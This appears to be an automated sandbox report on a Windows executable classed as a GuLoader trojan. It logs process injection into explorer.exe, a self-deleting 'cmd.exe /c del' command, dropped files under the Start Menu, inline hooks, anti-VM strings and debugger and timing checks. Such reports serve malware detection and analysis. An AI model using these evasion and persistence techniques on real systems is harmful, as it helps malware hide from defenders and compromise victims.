Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: MaMsKRmgXZ.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

File read: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Jump to behavior

Source: MaMsKRmgXZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exe
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Process created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Process created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

0_2_00403235

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens

Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

File created: C:\Users\user\AppData\Local\Temp\nsgC13C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/9@24/16

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,

0_2_00402138

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 0_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004044FA

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:304:WilStaging_02

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

File written: C:\Users\user\AppData\Local\Temp\reinhold.ini

Jump to behavior

Source: MaMsKRmgXZ.exe

Static file information: File size 1239576 > 1048576

Source: MaMsKRmgXZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cscript.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: wntdll.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9889030155.000000003400B000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9885871451.0000000033E5E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
Source:	Binary string: mshtml.pdbUGP source: MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: cscript.pdb source: MaMsKRmgXZ.exe, 00000002.00000003.9948228085.0000000004182000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947395565.000000000415F000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9970397613.0000000034030000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.9888945373.0000000005969000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_6EC02F60 push eax; ret	0_2_6EC02F8E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E08CD push ecx; mov dword ptr [esp], ecx	2_2_341E08D6
Source: C:\Windows\explorer.exe	Code function: 4_2_0A732B1E push esp; retn 0000h	4_2_0A732B1F
Source: C:\Windows\explorer.exe	Code function: 4_2_0A732B02 push esp; retn 0000h	4_2_0A732B03
Source: C:\Windows\explorer.exe	Code function: 4_2_0A7329B5 push esp; retn 0000h	4_2_0A732AE7
Source: C:\Windows\explorer.exe	Code function: 4_2_119029B5 push esp; retn 0000h	4_2_11902AE7
Source: C:\Windows\explorer.exe	Code function: 4_2_11902B1E push esp; retn 0000h	4_2_11902B1F
Source: C:\Windows\explorer.exe	Code function: 4_2_11902B02 push esp; retn 0000h	4_2_11902B03
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_046508CD push ecx; mov dword ptr [esp], ecx	5_2_046508D6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AD4B5 push eax; ret	5_2_021AD508
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AD50B push eax; ret	5_2_021AD572
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AD502 push eax; ret	5_2_021AD508
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021AD56C push eax; ret	5_2_021AD572
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021A0884 push edi; ret	5_2_021A0886
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021A6955 push EB934395h; ret	5_2_021A695A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 5_2_021A0FD6 pushfd ; retf	5_2_021A0FD7

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 0_2_6EC01A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6EC01A98

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

File created: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Ovariet.Puf73	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Megapterine.buc	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\dozerens\Nitzschia.App	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\haves.ant	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\laggin.tel	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Borgerkrigenes\Frasefyldt\regneoperatorers.txt	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae\unintriguing.tie	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE8

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_4-13904

Source: C:\Windows\explorer.exe TID: 4836	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4836	Thread sleep time: -222000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4836	Thread sleep count: 9865 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4836	Thread sleep time: -19730000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 4324	Thread sleep count: 117 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 4324	Thread sleep time: -234000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 4324	Thread sleep count: 9850 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 4324	Thread sleep time: -19700000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 2_2_34221763 rdtsc

2_2_34221763

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 9865	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 869	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 9850	Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	API coverage: 0.9 %
Source: C:\Windows\SysWOW64\cscript.exe	API coverage: 2.2 %

Source: C:\Windows\SysWOW64\cscript.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_004062DD FindFirstFileA,FindClose,	0_2_004062DD
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004057A2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	API call chain: ExitProcess graph end node			graph_0-4782
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	API call chain: ExitProcess graph end node			graph_0-4933

Source: MaMsKRmgXZ.exe, 00000002.00000002.9957323893.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9947544305.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886496116.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886681382.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9957522419.0000000004156000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE88000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MaMsKRmgXZ.exe, 00000002.00000003.9947544305.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886496116.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000003.9886681382.0000000004156000.00000004.00000020.00020000.00000000.sdmp, MaMsKRmgXZ.exe, 00000002.00000002.9957522419.0000000004156000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG
Source: explorer.exe, 00000004.00000002.14576881586.000000000CE88000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000CE88000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWgTuQ
Source: explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWLE`

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 0_2_6EC01A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6EC01A98

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Code function: 2_2_34221763 rdtsc

2_2_34221763

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34217425 mov eax, dword ptr fs:[00000030h]	2_2_34217425
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34217425 mov ecx, dword ptr fs:[00000030h]	2_2_34217425
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3427B420 mov eax, dword ptr fs:[00000030h]	2_2_3427B420
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3427B420 mov eax, dword ptr fs:[00000030h]	2_2_3427B420
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]	2_2_3426F42F
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]	2_2_3426F42F
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]	2_2_3426F42F
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]	2_2_3426F42F
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426F42F mov eax, dword ptr fs:[00000030h]	2_2_3426F42F
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34269429 mov eax, dword ptr fs:[00000030h]	2_2_34269429
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341D640D mov eax, dword ptr fs:[00000030h]	2_2_341D640D
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429D430 mov eax, dword ptr fs:[00000030h]	2_2_3429D430
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429D430 mov eax, dword ptr fs:[00000030h]	2_2_3429D430
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429F409 mov eax, dword ptr fs:[00000030h]	2_2_3429F409
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34276400 mov eax, dword ptr fs:[00000030h]	2_2_34276400
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34276400 mov eax, dword ptr fs:[00000030h]	2_2_34276400
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341DB420 mov eax, dword ptr fs:[00000030h]	2_2_341DB420
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426E461 mov eax, dword ptr fs:[00000030h]	2_2_3426E461
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]	2_2_341ED454
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]	2_2_341ED454
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]	2_2_341ED454
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]	2_2_341ED454
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]	2_2_341ED454
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341ED454 mov eax, dword ptr fs:[00000030h]	2_2_341ED454
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342AA464 mov eax, dword ptr fs:[00000030h]	2_2_342AA464
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429F478 mov eax, dword ptr fs:[00000030h]	2_2_3429F478
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341F0445 mov eax, dword ptr fs:[00000030h]	2_2_341F0445
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_34260443 mov eax, dword ptr fs:[00000030h]	2_2_34260443
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E8470 mov eax, dword ptr fs:[00000030h]	2_2_341E8470
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E8470 mov eax, dword ptr fs:[00000030h]	2_2_341E8470
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421D450 mov eax, dword ptr fs:[00000030h]	2_2_3421D450
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421D450 mov eax, dword ptr fs:[00000030h]	2_2_3421D450
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]	2_2_3420E45E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]	2_2_3420E45E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]	2_2_3420E45E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]	2_2_3420E45E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420E45E mov eax, dword ptr fs:[00000030h]	2_2_3420E45E
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426D4A0 mov ecx, dword ptr fs:[00000030h]	2_2_3426D4A0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426D4A0 mov eax, dword ptr fs:[00000030h]	2_2_3426D4A0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426D4A0 mov eax, dword ptr fs:[00000030h]	2_2_3426D4A0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342144A8 mov eax, dword ptr fs:[00000030h]	2_2_342144A8
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342954B0 mov eax, dword ptr fs:[00000030h]	2_2_342954B0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342954B0 mov ecx, dword ptr fs:[00000030h]	2_2_342954B0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E0485 mov ecx, dword ptr fs:[00000030h]	2_2_341E0485
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342784BB mov eax, dword ptr fs:[00000030h]	2_2_342784BB
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421E4BC mov eax, dword ptr fs:[00000030h]	2_2_3421E4BC
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421648A mov eax, dword ptr fs:[00000030h]	2_2_3421648A
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421648A mov eax, dword ptr fs:[00000030h]	2_2_3421648A
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421648A mov eax, dword ptr fs:[00000030h]	2_2_3421648A
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421B490 mov eax, dword ptr fs:[00000030h]	2_2_3421B490
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421B490 mov eax, dword ptr fs:[00000030h]	2_2_3421B490
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426C490 mov eax, dword ptr fs:[00000030h]	2_2_3426C490
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E24A2 mov eax, dword ptr fs:[00000030h]	2_2_341E24A2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E24A2 mov ecx, dword ptr fs:[00000030h]	2_2_341E24A2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342154E0 mov eax, dword ptr fs:[00000030h]	2_2_342154E0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421E4EF mov eax, dword ptr fs:[00000030h]	2_2_3421E4EF
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421E4EF mov eax, dword ptr fs:[00000030h]	2_2_3421E4EF
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421A4F0 mov eax, dword ptr fs:[00000030h]	2_2_3421A4F0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421A4F0 mov eax, dword ptr fs:[00000030h]	2_2_3421A4F0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3429F4FD mov eax, dword ptr fs:[00000030h]	2_2_3429F4FD
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426E4F2 mov eax, dword ptr fs:[00000030h]	2_2_3426E4F2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3426E4F2 mov eax, dword ptr fs:[00000030h]	2_2_3426E4F2
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342094FA mov eax, dword ptr fs:[00000030h]	2_2_342094FA
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]	2_2_342014C9
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]	2_2_342014C9
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]	2_2_342014C9
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]	2_2_342014C9
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342014C9 mov eax, dword ptr fs:[00000030h]	2_2_342014C9
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_341E64F0 mov eax, dword ptr fs:[00000030h]	2_2_341E64F0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3420F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3420F4D0
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342044D1 mov eax, dword ptr fs:[00000030h]	2_2_342044D1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_342044D1 mov eax, dword ptr fs:[00000030h]	2_2_342044D1
Source: C:\Users\user\Desktop\MaMsKRmgXZ.exe	Code function: 2_2_3421F523 mov eax, dword ptr fs:[00000030h]	2_2_3421F523
